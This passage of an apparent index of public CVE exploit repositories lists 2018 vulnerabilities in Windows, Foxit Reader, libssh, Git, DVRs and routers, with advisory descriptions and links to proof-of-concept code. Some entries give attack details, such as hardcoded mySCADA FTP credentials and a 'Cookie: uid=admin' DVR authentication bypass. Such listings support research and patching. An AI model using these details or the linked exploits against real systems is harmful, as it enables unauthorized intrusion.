A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka "Scripting Engine Memory Corruption Vulnerability." This affects Internet Explorer 9, Internet Explorer 11, Internet Explorer 10. This CVE ID is unique from CVE-2018-8353, CVE-2018-8355, CVE-2018-8359, CVE-2018-8371, CVE-2018-8372, CVE-2018-8373, CVE-2018-8385, CVE-2018-8390.
- [sharmasandeepkr/cve-2018-8389](https://github.com/sharmasandeepkr/cve-2018-8389)
### CVE-2018-8410 (2018-09-13)
An elevation of privilege vulnerability exists when the Windows Kernel API improperly handles registry objects in memory, aka "Windows Registry Elevation of Privilege Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.
- [trapmine/CVE-2018-8410](https://github.com/trapmine/CVE-2018-8410)
### CVE-2018-8414 (2018-08-15)
A remote code execution vulnerability exists when the Windows Shell does not properly validate file paths, aka "Windows Shell Remote Code Execution Vulnerability." This affects Windows 10 Servers, Windows 10.
- [whereisr0da/CVE-2018-8414-POC](https://github.com/whereisr0da/CVE-2018-8414-POC)
### CVE-2018-8420 (2018-09-13)
A remote code execution vulnerability exists when the Microsoft XML Core Services MSXML parser processes user input, aka "MS XML Remote Code Execution Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.
- [idkwim/CVE-2018-8420](https://github.com/idkwim/CVE-2018-8420)
### CVE-2018-8440 (2018-09-13)
An elevation of privilege vulnerability exists when Windows improperly handles calls to Advanced Local Procedure Call (ALPC), aka "Windows ALPC Elevation of Privilege Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.
- [sourceincite/CVE-2018-8440](https://github.com/sourceincite/CVE-2018-8440)
### CVE-2018-8453 (2018-10-10)
An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka "Win32k Elevation of Privilege Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.
- [Mkv4/cve-2018-8453-exp](https://github.com/Mkv4/cve-2018-8453-exp)
- [ze0r/cve-2018-8453-exp](https://github.com/ze0r/cve-2018-8453-exp)
- [thepwnrip/leHACK-Analysis-of-CVE-2018-8453](https://github.com/thepwnrip/leHACK-Analysis-of-CVE-2018-8453)
### CVE-2018-8495 (2018-10-10)
A remote code execution vulnerability exists when Windows Shell improperly handles URIs, aka "Windows Shell Remote Code Execution Vulnerability." This affects Windows Server 2016, Windows 10, Windows 10 Servers.
- [whereisr0da/CVE-2018-8495-POC](https://github.com/whereisr0da/CVE-2018-8495-POC)
### CVE-2018-8581 (2018-11-14)
An elevation of privilege vulnerability exists in Microsoft Exchange Server, aka "Microsoft Exchange Server Elevation of Privilege Vulnerability." This affects Microsoft Exchange Server.
- [WyAtu/CVE-2018-8581](https://github.com/WyAtu/CVE-2018-8581)
- [qiantu88/CVE-2018-8581](https://github.com/qiantu88/CVE-2018-8581)
- [Ridter/Exchange2domain](https://github.com/Ridter/Exchange2domain)
### CVE-2018-8587 (2018-12-12)
A remote code execution vulnerability exists in Microsoft Outlook software when it fails to properly handle objects in memory, aka "Microsoft Outlook Remote Code Execution Vulnerability." This affects Office 365 ProPlus, Microsoft Office, Microsoft Outlook.
- [Sunqiz/CVE-2018-8587-reproduction](https://github.com/Sunqiz/CVE-2018-8587-reproduction)
### CVE-2018-8611 (2018-12-12)
An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka "Windows Kernel Elevation of Privilege Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.
- [lsw29475/CVE-2018-8611](https://github.com/lsw29475/CVE-2018-8611)
### CVE-2018-8617 (2018-12-12)
A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka "Chakra Scripting Engine Memory Corruption Vulnerability." This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2018-8583, CVE-2018-8618, CVE-2018-8624, CVE-2018-8629.
- [bb33bb/cve-2018-8617-aab-r-w-](https://github.com/bb33bb/cve-2018-8617-aab-r-w-)
### CVE-2018-8639 (2018-12-12)
An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka "Win32k Elevation of Privilege Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-8641.
- [ze0r/CVE-2018-8639-exp](https://github.com/ze0r/CVE-2018-8639-exp)
- [timwhitez/CVE-2018-8639-EXP](https://github.com/timwhitez/CVE-2018-8639-EXP)
### CVE-2018-8718 (2018-03-27)
Cross-site request forgery (CSRF) vulnerability in the Mailer Plugin 1.20 for Jenkins 2.111 allows remote authenticated users to send unauthorized mail as an arbitrary user via a /descriptorByName/hudson.tasks.Mailer/sendTestMail request.
- [GeunSam2/CVE-2018-8718](https://github.com/GeunSam2/CVE-2018-8718)
### CVE-2018-8820 (2018-03-28)
An issue was discovered in Square 9 GlobalForms 6.2.x. A Time Based SQL injection vulnerability in the "match" parameter allows remote authenticated attackers to execute arbitrary SQL commands. It is possible to upgrade access to full server compromise via xp_cmdshell. In some cases, the authentication requirement for the attack can be met by sending the default admin credentials.
- [hateshape/frevvomapexec](https://github.com/hateshape/frevvomapexec)
### CVE-2018-8897 (2018-05-08)
A statement in the System Programming Guide of the Intel 64 and IA-32 Architectures Software Developer's Manual (SDM) was mishandled in the development of some or all operating-system kernels, resulting in unexpected behavior for #DB exceptions that are deferred by MOV SS or POP SS, as demonstrated by (for example) privilege escalation in Windows, macOS, some Xen configurations, or FreeBSD, or a Linux kernel crash. The MOV to SS and POP SS instructions inhibit interrupts (including NMIs), data breakpoints, and single step trap exceptions until the instruction boundary following the next instruction (SDM Vol. 3A; section 6.8.3). (The inhibited data breakpoints are those on memory accessed by the MOV to SS or POP to SS instruction itself.) Note that debug exceptions are not inhibited by the interrupt enable (EFLAGS.IF) system flag (SDM Vol. 3A; section 2.3). If the instruction following the MOV to SS or POP to SS instruction is an instruction like SYSCALL, SYSENTER, INT 3, etc. that transfers control to the operating system at CPL < 3, the debug exception is delivered after the transfer to CPL < 3 is complete. OS kernels may not expect this order of events and may therefore experience unexpected behavior when it occurs.
- [nmulasmajic/CVE-2018-8897](https://github.com/nmulasmajic/CVE-2018-8897)
- [jiazhang0/pop-mov-ss-exploit](https://github.com/jiazhang0/pop-mov-ss-exploit)
- [can1357/CVE-2018-8897](https://github.com/can1357/CVE-2018-8897)
- [nmulasmajic/syscall_exploit_CVE-2018-8897](https://github.com/nmulasmajic/syscall_exploit_CVE-2018-8897)
### CVE-2018-8941 (2018-04-03)
Diagnostics functionality on D-Link DSL-3782 devices with firmware EU v. 1.01 has a buffer overflow, allowing authenticated remote attackers to execute arbitrary code via a long Addr value to the 'set Diagnostics_Entry' function in an HTTP request, related to /userfs/bin/tcapi.
- [SECFORCE/CVE-2018-8941](https://github.com/SECFORCE/CVE-2018-8941)
### CVE-2018-8947 (2018-03-25)
rap2hpoutre Laravel Log Viewer before v0.13.0 relies on Base64 encoding for l, dl, and del requests, which makes it easier for remote attackers to bypass intended access restrictions, as demonstrated by reading arbitrary files via a dl request.
- [scopion/CVE-2018-8947](https://github.com/scopion/CVE-2018-8947)
### CVE-2018-8970 (2018-03-24)
The int_x509_param_set_hosts function in lib/libcrypto/x509/x509_vpm.c in LibreSSL 2.7.0 before 2.7.1 does not support a certain special case of a zero name length, which causes silent omission of hostname verification, and consequently allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate. NOTE: the LibreSSL documentation indicates that this special case is supported, but the BoringSSL documentation does not.
- [tiran/CVE-2018-8970](https://github.com/tiran/CVE-2018-8970)
### CVE-2018-9059 (2018-04-20)
Stack-based buffer overflow in Easy File Sharing (EFS) Web Server 7.2 allows remote attackers to execute arbitrary code via a malicious login request to forum.ghp. NOTE: this may overlap CVE-2014-3791.
- [manojcode/easy-file-share-7.2-exploit-CVE-2018-9059](https://github.com/manojcode/easy-file-share-7.2-exploit-CVE-2018-9059)
### CVE-2018-9075 (2018-09-28)
For some Iomega, Lenovo, LenovoEMC NAS devices versions 4.1.402.34662 and earlier, when joining a PersonalCloud setup, an attacker can craft a command injection payload using backtick "``" characters in the client:password parameter. As a result, arbitrary commands may be executed as the root user. The attack requires a value __c and iomega parameter.
- [beverlymiller818/cve-2018-9075](https://github.com/beverlymiller818/cve-2018-9075)
### CVE-2018-9160 (2018-03-31)
SickRage before v2018.03.09-1 includes cleartext credentials in HTTP responses.
- [mechanico/sickrageWTF](https://github.com/mechanico/sickrageWTF)
### CVE-2018-9206 (2018-10-11)
Unauthenticated arbitrary file upload vulnerability in Blueimp jQuery-File-Upload <= v9.22.0
- [Den1al/CVE-2018-9206](https://github.com/Den1al/CVE-2018-9206)
- [Stahlz/JQShell](https://github.com/Stahlz/JQShell)
- [cved-sources/cve-2018-9206](https://github.com/cved-sources/cve-2018-9206)
- [mi-hood/CVE-2018-9206](https://github.com/mi-hood/CVE-2018-9206)
### CVE-2018-9207 (2018-11-19)
Arbitrary file upload in jQuery Upload File <= 4.0.2
- [cved-sources/cve-2018-9207](https://github.com/cved-sources/cve-2018-9207)
### CVE-2018-9208 (2018-11-05)
Unauthenticated arbitrary file upload vulnerability in jQuery Picture Cut <= v1.1Beta
- [cved-sources/cve-2018-9208](https://github.com/cved-sources/cve-2018-9208)
### CVE-2018-9276 (2018-07-02)
An issue was discovered in PRTG Network Monitor before 18.2.39. An attacker who has access to the PRTG System Administrator web console with administrative privileges can exploit an OS command injection vulnerability (both on the server and on devices) by sending malformed parameters in sensor or notification management scenarios.
- [wildkindcc/CVE-2018-9276](https://github.com/wildkindcc/CVE-2018-9276)
- [andyfeili/CVE-2018-9276](https://github.com/andyfeili/CVE-2018-9276)
- [alvinsmith-eroad/CVE-2018-9276](https://github.com/alvinsmith-eroad/CVE-2018-9276)
### CVE-2018-9375
- [IOActive/AOSP-ExploitUserDictionary](https://github.com/IOActive/AOSP-ExploitUserDictionary)
### CVE-2018-9411
- [tamirzb/CVE-2018-9411](https://github.com/tamirzb/CVE-2018-9411)
### CVE-2018-9468
- [IOActive/AOSP-DownloadProviderHijacker](https://github.com/IOActive/AOSP-DownloadProviderHijacker)
### CVE-2018-9493 (2018-10-02)
In the content provider of the download manager, there is a possible SQL injection due to improper input validation. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android-9.0 Android ID: A-111085900
- [IOActive/AOSP-DownloadProviderDbDumper](https://github.com/IOActive/AOSP-DownloadProviderDbDumper)
### CVE-2018-9539 (2018-11-14)
In the ClearKey CAS descrambler, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-8.0 Android-8.1 Android-9. Android ID: A-113027383
- [tamirzb/CVE-2018-9539](https://github.com/tamirzb/CVE-2018-9539)
### CVE-2018-9546
- [IOActive/AOSP-DownloadProviderHeadersDumper](https://github.com/IOActive/AOSP-DownloadProviderHeadersDumper)
### CVE-2018-9948 (2018-05-17)
This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit Reader 9.0.0.29935. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of typed arrays. The issue results from the lack of proper initialization of a pointer prior to accessing it. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process. Was ZDI-CAN-5380.
- [manojcode/Foxit-Reader-RCE-with-virualalloc-and-shellcode-for-CVE-2018-9948-and-CVE-2018-9958](https://github.com/manojcode/Foxit-Reader-RCE-with-virualalloc-and-shellcode-for-CVE-2018-9948-and-CVE-2018-9958)
- [orangepirate/cve-2018-9948-9958-exp](https://github.com/orangepirate/cve-2018-9948-9958-exp)
### CVE-2018-9950 (2018-05-17)
This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit Reader 9.0.0.29935. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF documents. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process. Was ZDI-CAN-5413.
- [sharmasandeepkr/PS-2017-13---CVE-2018-9950](https://github.com/sharmasandeepkr/PS-2017-13---CVE-2018-9950)
### CVE-2018-9951 (2018-05-17)
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 9.0.0.29935. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of CPDF_Object objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5414.
- [sharmasandeepkr/cve-2018-9951](https://github.com/sharmasandeepkr/cve-2018-9951)
### CVE-2018-9958 (2018-05-17)
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 9.0.1.1049. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of Text Annotations. When setting the point attribute, the process does not properly validate the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5620.
- [t3rabyt3-zz/CVE-2018-9958--Exploit](https://github.com/t3rabyt3-zz/CVE-2018-9958--Exploit)
### CVE-2018-9995 (2018-04-10)
TBK DVR4104 and DVR4216 devices, as well as Novo, CeNova, QSee, Pulnix, XVR 5 in 1, Securus, Night OWL, DVR Login, HVR Login, and MDVR Login, which run re-branded versions of the original TBK DVR4104 and DVR4216 series, allow remote attackers to bypass authentication via a "Cookie: uid=admin" header, as demonstrated by a device.rsp?opt=user&cmd=list request that provides credentials within JSON data in a response.
- [ezelf/CVE-2018-9995_dvr_credentials](https://github.com/ezelf/CVE-2018-9995_dvr_credentials)
- [zzh217/CVE-2018-9995_Batch_scanning_exp](https://github.com/zzh217/CVE-2018-9995_Batch_scanning_exp)
- [Huangkey/CVE-2018-9995_check](https://github.com/Huangkey/CVE-2018-9995_check)
- [gwolfs/CVE-2018-9995-ModifiedByGwolfs](https://github.com/gwolfs/CVE-2018-9995-ModifiedByGwolfs)
- [shacojx/cve-2018-9995](https://github.com/shacojx/cve-2018-9995)
- [Cyb0r9/DVR-Exploiter](https://github.com/Cyb0r9/DVR-Exploiter)
- [codeholic2k18/CVE-2018-9995](https://github.com/codeholic2k18/CVE-2018-9995)
- [TateYdq/CVE-2018-9995-ModifiedByGwolfs](https://github.com/TateYdq/CVE-2018-9995-ModifiedByGwolfs)
- [ABIZCHI/CVE-2018-9995_dvr_credentials](https://github.com/ABIZCHI/CVE-2018-9995_dvr_credentials)
- [MrAli-Code/CVE-2018-9995_dvr_credentials](https://github.com/MrAli-Code/CVE-2018-9995_dvr_credentials)
- [likaifeng0/CVE-2018-9995_dvr_credentials-dev_tool](https://github.com/likaifeng0/CVE-2018-9995_dvr_credentials-dev_tool)
- [b510/CVE-2018-9995-POC](https://github.com/b510/CVE-2018-9995-POC)
- [wmasday/HTC](https://github.com/wmasday/HTC)
- [awesome-consumer-iot/HTC](https://github.com/awesome-consumer-iot/HTC)
- [Saeed22487/CVE-2018-9995](https://github.com/Saeed22487/CVE-2018-9995)
- [kienquoc102/CVE-2018-9995-2](https://github.com/kienquoc102/CVE-2018-9995-2)
- [dearpan/cve-2018-9995](https://github.com/dearpan/cve-2018-9995)
- [LeQuocKhanh2K/Tool_Exploit_Password_Camera_CVE-2018-9995](https://github.com/LeQuocKhanh2K/Tool_Exploit_Password_Camera_CVE-2018-9995)
- [hoaan1995/CVE-2018-9995](https://github.com/hoaan1995/CVE-2018-9995)
- [ST0PL/DVRFaultNET](https://github.com/ST0PL/DVRFaultNET)
- [K3ysTr0K3R/CVE-2018-9995-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2018-9995-EXPLOIT)
- [Pab450/CVE-2018-9995](https://github.com/Pab450/CVE-2018-9995)
- [arminarab1999/CVE-2018-9995](https://github.com/arminarab1999/CVE-2018-9995)
- [X3RX3SSec/DVR_Sploit](https://github.com/X3RX3SSec/DVR_Sploit)
- [batmoshka55/CVE-2018-9995_dvr_credentials](https://github.com/batmoshka55/CVE-2018-9995_dvr_credentials)
- [dego905/Cam](https://github.com/dego905/Cam)
- [A-Alabdoo/CVE-DVr](https://github.com/A-Alabdoo/CVE-DVr)
### CVE-2018-10097 (2018-04-13)
XSS exists in Domain Trader 2.5.3 via the recoverlogin.php email_address parameter.
- [ashangp923/CVE-2018-10097](https://github.com/ashangp923/CVE-2018-10097)
### CVE-2018-10118 (2018-04-15)
Monstra CMS 3.0.4 has Stored XSS via the Name field on the Create New Page screen under the admin/index.php?id=pages URI, related to plugins/box/pages/pages.admin.php.
- [GeunSam2/CVE-2018-10118](https://github.com/GeunSam2/CVE-2018-10118)
### CVE-2018-10299 (2018-04-23)
An integer overflow in the batchTransfer function of a smart contract implementation for Beauty Ecosystem Coin (BEC), the Ethereum ERC20 token used in the Beauty Chain economic system, allows attackers to accomplish an unauthorized increase of digital assets by providing two _receivers arguments in conjunction with a large _value argument, as exploited in the wild in April 2018, aka the "batchOverflow" issue.
- [phzietsman/batchOverflow](https://github.com/phzietsman/batchOverflow)
### CVE-2018-10388 (2019-12-23)
Format string vulnerability in the logMess function in TFTP Server SP 1.66 and earlier allows remote attackers to perform a denial of service or execute arbitrary code via format string sequences in a TFTP error packet.
- [0xddaa/CVE-2018-10388](https://github.com/0xddaa/CVE-2018-10388)
### CVE-2018-10467
- [alt3kx/CVE-2018-10467](https://github.com/alt3kx/CVE-2018-10467)
### CVE-2018-10517 (2018-04-27)
In CMS Made Simple (CMSMS) through 2.2.7, the "module import" operation in the admin dashboard contains a remote code execution vulnerability, exploitable by an admin user, because an XML Package can contain base64-encoded PHP code in a data element.
- [0x00-0x00/CVE-2018-10517](https://github.com/0x00-0x00/CVE-2018-10517)
### CVE-2018-10546 (2018-04-29)
An issue was discovered in PHP before 5.6.36, 7.0.x before 7.0.30, 7.1.x before 7.1.17, and 7.2.x before 7.2.5. An infinite loop exists in ext/iconv/iconv.c because the iconv stream filter does not reject invalid multibyte sequences.
- [dsfau/CVE-2018-10546](https://github.com/dsfau/CVE-2018-10546)
### CVE-2018-10562 (2018-05-04)
An issue was discovered on Dasan GPON home routers. Command Injection can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output.
- [ExiaHan/GPON](https://github.com/ExiaHan/GPON)
- [649/Pingpon-Exploit](https://github.com/649/Pingpon-Exploit)
- [Choudai/GPON-LOADER](https://github.com/Choudai/GPON-LOADER)
- [c0ld1/GPON_RCE](https://github.com/c0ld1/GPON_RCE)
- [ATpiu/CVE-2018-10562](https://github.com/ATpiu/CVE-2018-10562)
### CVE-2018-10583 (2018-05-01)
An information disclosure vulnerability occurs when LibreOffice 6.0.3 and Apache OpenOffice Writer 4.1.5 automatically process and initiate an SMB connection embedded in a malicious file, as demonstrated by xlink:href=file://192.168.0.2/test.jpg within an office:document-content element in a .odt XML document.
- [MrTaherAmine/CVE-2018-10583](https://github.com/MrTaherAmine/CVE-2018-10583)
- [octodi/CVE-2018-10583](https://github.com/octodi/CVE-2018-10583)
### CVE-2018-10715
- [alt3kx/CVE-2018-10715](https://github.com/alt3kx/CVE-2018-10715)
### CVE-2018-10732 (2018-05-28)
The REST API in Dataiku DSS before 4.2.3 allows remote attackers to obtain sensitive information (i.e., determine if a username is valid) because of profile pictures visibility.
- [alt3kx/CVE-2018-10732](https://github.com/alt3kx/CVE-2018-10732)
### CVE-2018-10821 (2018-06-14)
Cross-site scripting (XSS) vulnerability in backend/pages/modify.php in BlackCatCMS 1.3 allows remote authenticated users with the Admin role to inject arbitrary web script or HTML via the search panel.
- [BalvinderSingh23/Cross-Site-Scripting-Reflected-XSS-Vulnerability-in-blackcatcms_v1.3](https://github.com/BalvinderSingh23/Cross-Site-Scripting-Reflected-XSS-Vulnerability-in-blackcatcms_v1.3)
### CVE-2018-10920 (2018-08-02)
Improper input validation bug in DNS resolver component of Knot Resolver before 2.4.1 allows remote attacker to poison cache.
- [shutingrz/CVE-2018-10920_PoC](https://github.com/shutingrz/CVE-2018-10920_PoC)
### CVE-2018-10933 (2018-10-17)
A vulnerability was found in libssh's server-side state machine before versions 0.7.6 and 0.8.4. A malicious client could create channels without first performing authentication, resulting in unauthorized access.
- [SoledaD208/CVE-2018-10933](https://github.com/SoledaD208/CVE-2018-10933)
- [blacknbunny/CVE-2018-10933](https://github.com/blacknbunny/CVE-2018-10933)
- [hook-s3c/CVE-2018-10933](https://github.com/hook-s3c/CVE-2018-10933)
- [kn6869610/CVE-2018-10933](https://github.com/kn6869610/CVE-2018-10933)
- [jobroche/libssh-scanner](https://github.com/jobroche/libssh-scanner)
- [likekabin/CVE-2018-10933_ssh](https://github.com/likekabin/CVE-2018-10933_ssh)
- [likekabin/CVE-2018-10933-libSSH-Authentication-Bypass](https://github.com/likekabin/CVE-2018-10933-libSSH-Authentication-Bypass)
- [marco-lancini/hunt-for-cve-2018-10933](https://github.com/marco-lancini/hunt-for-cve-2018-10933)
- [hackerhouse-opensource/cve-2018-10933](https://github.com/hackerhouse-opensource/cve-2018-10933)
- [cve-2018/cve-2018-10933](https://github.com/cve-2018/cve-2018-10933)
- [jas502n/CVE-2018-10933](https://github.com/jas502n/CVE-2018-10933)
- [ninp0/cve-2018-10933_poc](https://github.com/ninp0/cve-2018-10933_poc)
- [pghook/CVE-2018-10933_Scanner](https://github.com/pghook/CVE-2018-10933_Scanner)
- [Virgula0/POC-CVE-2018-10933](https://github.com/Virgula0/POC-CVE-2018-10933)
- [shifa123/pythonprojects-CVE-2018-10933](https://github.com/shifa123/pythonprojects-CVE-2018-10933)
- [xFreed0m/CVE-2018-10933](https://github.com/xFreed0m/CVE-2018-10933)
- [Bifrozt/CVE-2018-10933](https://github.com/Bifrozt/CVE-2018-10933)
- [r3dxpl0it/CVE-2018-10933](https://github.com/r3dxpl0it/CVE-2018-10933)
- [ivanacostarubio/libssh-scanner](https://github.com/ivanacostarubio/libssh-scanner)
- [throwawayaccount12312312/precompiled-CVE-2018-10933](https://github.com/throwawayaccount12312312/precompiled-CVE-2018-10933)
- [reanimat0r/bpnd-libssh](https://github.com/reanimat0r/bpnd-libssh)
- [ensimag-security/CVE-2018-10933](https://github.com/ensimag-security/CVE-2018-10933)
- [0xadaw/libSSH-bypass](https://github.com/0xadaw/libSSH-bypass)
- [sambiyal/CVE-2018-10933-POC](https://github.com/sambiyal/CVE-2018-10933-POC)
- [nikhil1232/LibSSH-Authentication-Bypass](https://github.com/nikhil1232/LibSSH-Authentication-Bypass)
- [Kurlee/LibSSH-exploit](https://github.com/Kurlee/LibSSH-exploit)
- [crispy-peppers/Libssh-server-CVE-2018-10933](https://github.com/crispy-peppers/Libssh-server-CVE-2018-10933)
- [youkergav/CVE-2018-10933](https://github.com/youkergav/CVE-2018-10933)
- [kristyna-mlcakova/CVE-2018-10933](https://github.com/kristyna-mlcakova/CVE-2018-10933)
- [lalishasanduwara/CVE-2018-10933](https://github.com/lalishasanduwara/CVE-2018-10933)
- [JoSecMx/CVE-2018-10933_Scanner](https://github.com/JoSecMx/CVE-2018-10933_Scanner)
- [cyberharsh/Libssh-server-CVE-2018-10933](https://github.com/cyberharsh/Libssh-server-CVE-2018-10933)
- [Rubikcuv5/CVE-2018-10933](https://github.com/Rubikcuv5/CVE-2018-10933)
- [SilasSpringer/CVE-2018-10933](https://github.com/SilasSpringer/CVE-2018-10933)
- [HSw109/CVE-2018-10933](https://github.com/HSw109/CVE-2018-10933)
### CVE-2018-10936 (2018-08-30)
A weakness was found in postgresql-jdbc before version 42.2.5. It was possible to provide an SSL Factory and not check the host name if a host name verifier was not provided to the driver. This could lead to a condition where a man-in-the-middle attacker could masquerade as a trusted server by providing a certificate for the wrong host, as long as it was signed by a trusted CA.
- [tafamace/CVE-2018-10936](https://github.com/tafamace/CVE-2018-10936)
### CVE-2018-10949 (2018-05-10)
mailboxd in Zimbra Collaboration Suite 8.8 before 8.8.8; 8.7 before 8.7.11.Patch3; and 8.6 allows Account Enumeration by leveraging a Discrepancy between the "HTTP 404 - account is not active" and "HTTP 401 - must authenticate" errors.
- [0x00-0x00/CVE-2018-10949](https://github.com/0x00-0x00/CVE-2018-10949)
### CVE-2018-10993
- [nicolastsk/cve-2018-10993](https://github.com/nicolastsk/cve-2018-10993)
### CVE-2018-11235 (2018-05-30)
In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1, remote code execution can occur. With a crafted .gitmodules file, a malicious project can execute an arbitrary script on a machine that runs "git clone --recurse-submodules" because submodule "names" are obtained from this file, and then appended to $GIT_DIR/modules, leading to directory traversal with "../" in a name. Finally, post-checkout hooks from a submodule are executed, bypassing the intended design in which hooks are not obtained from a remote server.
- [Rogdham/CVE-2018-11235](https://github.com/Rogdham/CVE-2018-11235)
- [vmotos/CVE-2018-11235](https://github.com/vmotos/CVE-2018-11235)
- [Choihosu/cve-2018-11235](https://github.com/Choihosu/cve-2018-11235)
- [CHYbeta/CVE-2018-11235-DEMO](https://github.com/CHYbeta/CVE-2018-11235-DEMO)
- [Kiss-sh0t/CVE-2018-11235-poc](https://github.com/Kiss-sh0t/CVE-2018-11235-poc)
- [H0K5/clone_and_pwn](https://github.com/H0K5/clone_and_pwn)
- [knqyf263/CVE-2018-11235](https://github.com/knqyf263/CVE-2018-11235)
- [ygouzerh/CVE-2018-11235](https://github.com/ygouzerh/CVE-2018-11235)
- [qweraqq/CVE-2018-11235-Git-Submodule-CE](https://github.com/qweraqq/CVE-2018-11235-Git-Submodule-CE)
- [AnonymKing/CVE-2018-11235](https://github.com/AnonymKing/CVE-2018-11235)
- [0rx1/CVE-2018-11235](https://github.com/0rx1/CVE-2018-11235)
- [cchang27/CVE-2018-11235-test](https://github.com/cchang27/CVE-2018-11235-test)
- [nthuong95/CVE-2018-11235](https://github.com/nthuong95/CVE-2018-11235)
- [xElkomy/CVE-2018-11235](https://github.com/xElkomy/CVE-2018-11235)
- [jongmartinez/CVE-2018-11235-PoC](https://github.com/jongmartinez/CVE-2018-11235-PoC)
- [MohamedTarekq/test-CVE-2018-11235](https://github.com/MohamedTarekq/test-CVE-2018-11235)
- [j4k0m/CVE-2018-11235](https://github.com/j4k0m/CVE-2018-11235)
- [twseptian/cve-2018-11235-git-submodule-ce-and-docker-ngrok-configuration](https://github.com/twseptian/cve-2018-11235-git-submodule-ce-and-docker-ngrok-configuration)
- [EmaVirgRep/CVE-2018-11235](https://github.com/EmaVirgRep/CVE-2018-11235)
- [theerachaich/lab](https://github.com/theerachaich/lab)
### CVE-2018-11311 (2018-05-20)
A hardcoded FTP username of myscada and password of Vikuk63 in 'myscadagate.exe' in mySCADA myPRO 7 allows remote attackers to access the FTP server on port 2121, and upload files or list directories, by entering these credentials.
- [EmreOvunc/mySCADA-myPRO-7-Hardcoded-FTP-Username-and-Password](https://github.com/EmreOvunc/mySCADA-myPRO-7-Hardcoded-FTP-Username-and-Password)
### CVE-2018-11321 (2018-05-22)
An issue was discovered in com_fields in Joomla! Core before 3.8.8. Inadequate filtering allows users authorised to create custom fields to manipulate the filtering options and inject an unvalidated option.
- [ExploitCN/CVE-2018-11321](https://github.com/ExploitCN/CVE-2018-11321)
### CVE-2018-11450 (2018-07-09)
A reflected Cross-Site-Scripting (XSS) vulnerability has been identified in Siemens PLM Software TEAMCENTER (V9.1.2.5). If a user visits the login portal through the URL crafted by the attacker, the attacker can insert html/javascript and thus alter/rewrite the login portal page. Siemens PLM Software TEAMCENTER V9.1.3 and newer are not affected.
- [LucvanDonk/Siemens-Siemens-PLM-Software-TEAMCENTER-Reflected-Cross-Site-Scripting-XSS-vulnerability](https://github.com/LucvanDonk/Siemens-Siemens-PLM-Software-TEAMCENTER-Reflected-Cross-Site-Scripting-XSS-vulnerability)
### CVE-2018-11510 (2018-06-28)
The ASUSTOR ADM 3.1.0.RFQ3 NAS portal suffers from an unauthenticated remote code execution vulnerability in the portal/apis/aggrecate_js.cgi file by embedding OS commands in the 'script' parameter.
- [mefulton/CVE-2018-11510](https://github.com/mefulton/CVE-2018-11510)
### CVE-2018-11517 (2018-05-28)
mySCADA myPRO 7 allows remote attackers to discover all ProjectIDs in a project by sending all of the prj parameter values from 870000 to 875000 in t=0&rq=0 requests to TCP port 11010.
- [EmreOvunc/mySCADA-myPRO-7-projectID-Disclosure](https://github.com/EmreOvunc/mySCADA-myPRO-7-projectID-Disclosure)
### CVE-2018-11564 (2018-06-01)
